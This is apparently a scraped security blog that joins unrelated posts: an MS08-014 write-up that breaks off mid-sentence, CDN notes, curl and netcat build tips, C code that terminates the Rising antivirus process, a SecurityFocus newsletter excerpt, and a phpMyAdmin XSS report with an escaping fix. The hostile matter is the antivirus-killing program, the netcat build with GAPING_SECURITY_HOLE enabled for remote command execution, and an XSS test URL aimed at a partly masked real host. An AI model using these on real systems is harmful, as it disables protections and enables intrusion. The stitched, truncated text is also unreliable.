MS08-014 : The Case of the Uninitialized Stack Variable Vulnerability


MS08-014 (CVE-2008-0081) addresses a vulnerability in Excel whose root cause is an uninitialized stack variable. You have probably seen these types of compiler warnings before:

C:\temp>cl stack.cpp

CDN Technology


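What is a CDN?
CDN stands for content delivery network. Its purpose is to add a new layer of network architecture on top of the existing Internet and publish a website's content to the network "edge" closest to users, so that users can fetch the content they need from nearby, which improves the site's response time.
A CDN differs from a mirror in that it is smarter than a mirror. As an analogy: CDN = smarter mirror + cache + traffic steering. A CDN can therefore noticeably improve the efficiency of information flow on the Internet. Technically, it comprehensively addresses problems caused by limited network bandwidth, high user traffic, and unevenly distributed sites, improving the site's response time.

CDN types and characteristics
CDN implementations fall into three categories: mirroring, caching, and dedicated lines.
Mirror sites are the most common. Content is published to them directly, which suits the synchronization of static and quasi-dynamic data. However, buying and maintaining new servers is expensive, mirror servers must be set up in each region, and professional technical staff are needed to manage and maintain them. For large websites, the bandwidth cost of updates also rises considerably.
Caching is cheaper and suits static content. Internet statistics show that more than 80% of users regularly access the content of 20% of websites. Under this pattern, cache servers can handle most clients' static requests, while the origin server only needs to handle the roughly 20% of requests that are uncached or dynamic, which greatly shortens the response time for client requests and reduces the load on the origin server.
Dedicated lines let users access the data source directly and allow dynamic data synchronization.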


[Repost] Fix for the digital signature error when installing VS2005 SP1


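1. Click Start, click Run, type control admintools, and then click OK.
2. Double-click Local Security Policy.
3. Click Software Restriction Policies. (Note: if no software restrictions are listed, right-click Software Restriction Policies and then click Create New Policy.)
4. Under Object Type, double-click Enforcement.
5. Click "All users except local administrators", and then click OK.

After a reboot, the installation works normally.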

Built curl for the Windows platform


A very handy tool.

D:\curl>curl --version
curl 7.17.1 (i386-pc-win32) libcurl/7.17.1 OpenSSL/0.9.8g zlib/1.2.3
Protocols: tftp ftp telnet dict ldap http file https ftps
Features: Largefile NTLM SSL libz

curl.7z

Compiling netcat on Linux


Very simple: comment out the res_init line in netcat.c.

make linux

If you want the build to include the -e and -t options, just add two define statements.

#define GAPING_SECURITY_HOLE
#define TELNET

Terminating the Rising antivirus process (repost)

#include "stdafx.h"   // Visual Studio precompiled header
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib, "Kernel32.lib")
#include <winbase.h>

int main(int argc, char* argv[])
{
    BOOL res = FALSE;

    if (argc < 2) // a process ID argument is required
    {
        printf("usage: %s <pid>\n", argv[0]);
        return 1;
    }

    HANDLE hjob = CreateJobObject(NULL, TEXT("killrav")); // create a job object named killrav

    HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, 0, atoi(argv[1])); // open the process

    if (hProcess == NULL) // open failed
    {
        printf("\t\t OpenProcessError!please Look up your Privilege first ^_^\n");
        return 0;
    }

    AssignProcessToJobObject(hjob, hProcess); // associate the process with the job object

    res = TerminateJobObject(hjob, 0); // terminate the job
    if (res == FALSE)
        printf("\t\t Sorry ,can't kill the process you want \n");
    else
        printf("\t\t Ok ,Now you can check if the process still exists \n");

    return 0;
}

I despise this kind of utterly irresponsible attitude.

SecurityFocus Microsoft Newsletter #370


SecurityFocus Microsoft Newsletter #370
----------------------------------------

This issue is Sponsored by: SPI Dynamics


SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Aye, Robot, or Can Computers Contract?
2. Don’t blame the IDS
II. MICROSOFT VULNERABILITY SUMMARY
1. Tencent QQ LaunchP2PShare Multiple Stack Buffer Overflow Vulnerabilities
2. VanDyke VShell Unspecified Denial Of Service Vulnerability
3. Samhain Labs Samhain Insecure Random Number Generator Information Disclosure Weakness
4. Skype Technologies Skype Voicemail URI Handler Remote Denial of Service Vulnerability
5. Apple QuickTime RTSP Response Header Content-Length Remote Buffer Overflow Vulnerability
6. Apple QuickTime RTSP Response Header Remote Stack Based Buffer Overflow Vulnerability
7. Wireshark 0.99.6 Multiple Remote Vulnerabilities
8. IBM Director CIM Server Remote Denial of Service Vulnerability
9. SMF Private Forum Messages Information Disclosure Vulnerability
10. Microsoft Windows Insecure Random Number Generator Information Disclosure Weakness
III. MICROSOFT FOCUS LIST SUMMARY
1. Windows NT Desktop
2. Security and Implications of Hosted Exchange
IV. UNSUBSCRIBE INSTRUCTIONS
V. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Aye, Robot, or Can Computers Contract?
By Mark Rasch
A contract is usually described as a “meeting of the minds.” One person makes an offer for goods or services; another person sees the offer and negotiates terms; the parties enter into an agreement of the offer; and some form of consideration is given in return for the provision of something of value. At least that’s what I remember from first year law school contracts class.
http://www.securityfocus.com/columnists/458
2. Don’t blame the IDS
By Don Parker
Some years ago, I remember reading a press release from the Gartner Group. It was about intrusion detection systems (IDS) offering little return for the monetary investment in them and furthermore, that this very same security technology would be obsolete by the year 2005. A rather bold statement and an even bolder prediction on their part.
http://www.securityfocus.com/columnists/457

II. MICROSOFT VULNERABILITY SUMMARY
------------------------------------
1. Tencent QQ LaunchP2PShare Multiple Stack Buffer Overflow Vulnerabilities
BugTraq ID: 26613
Remote: Yes
Date Published: 2007-11-27
Relevant URL: http://www.securityfocus.com/bid/26613
Summary:
Tencent QQ is prone to multiple stack-based buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.

phpMyAdmin 2.11.2.1 login page XSS

$ grep -n convcharset libraries/auth/cookie.auth.lib.php
48: * @uses    $GLOBALS['convcharset']
236: <input type="hidden" name="convcharset" value="<?php echo $GLOBALS['convcharset']; ?>" />

All input is harmful.
Test:

http://217.*.*.201/phpMyAdmin/index.php?convcharset=<script>alert(6code)</script>
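
The unescaped echo at line 236 is the defect. As an added example (not phpMyAdmin's own code or its actual fix), the sketch below renders the same hidden field once the way the grep output shows it and once with validation plus htmlspecialchars(). The function names and the charset-name pattern are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helpers, not phpMyAdmin code.

// "Before": mirrors the echo at line 236, the value goes into the attribute as-is.
function render_unescaped(string $convcharset): string
{
    return '<input type="hidden" name="convcharset" value="' . $convcharset . '" />';
}

// Assumed rule: charset names are short and use only letters, digits, '.', '_', '-'.
function is_plausible_charset(string $name): bool
{
    return preg_match('/^[A-Za-z0-9._-]{1,40}$/D', $name) === 1;
}

// "After": replace unexpected values, then escape for the HTML attribute context.
function render_escaped(string $convcharset, string $fallback = 'utf-8'): string
{
    if (!is_plausible_charset($convcharset)) {
        $convcharset = $fallback;
    }
    $safe = htmlspecialchars($convcharset, ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="convcharset" value="' . $safe . '" />';
}

// Constructed inputs: one ordinary charset name and the test value from the post.
$samples = ['iso-8859-1', '<script>alert(6code)</script>'];

foreach ($samples as $value) {
    echo "input:     ", $value, PHP_EOL;
    echo "unescaped: ", render_unescaped($value), PHP_EOL;
    echo "escaped:   ", render_escaped($value), PHP_EOL, PHP_EOL;
}
```

Escaping at the point of output is what closes the hole; the name check is defense in depth and keeps unexpected values out of later charset handling.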